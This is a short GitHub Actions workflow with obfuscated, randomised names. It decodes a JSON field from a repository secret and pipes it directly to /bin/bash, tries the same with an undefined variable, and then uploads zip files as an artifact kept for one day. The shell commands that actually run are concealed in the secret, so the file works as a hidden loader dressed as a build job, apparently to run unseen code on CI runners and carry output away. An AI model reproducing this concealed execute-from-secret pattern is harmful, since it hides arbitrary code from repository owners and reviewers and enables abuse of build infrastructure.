name: titansc6685
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: titansc6685
        env:
          ksost88: ${{ secrets.ksost88 }}
        run: |
          printf '%s' "$ksost88" | jq -r .dyyo053 | /bin/bash
          echo $dd9 | jq -r .nokc098 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: EcaZrTXT
          path: "*.zip"
          retention-days: 1
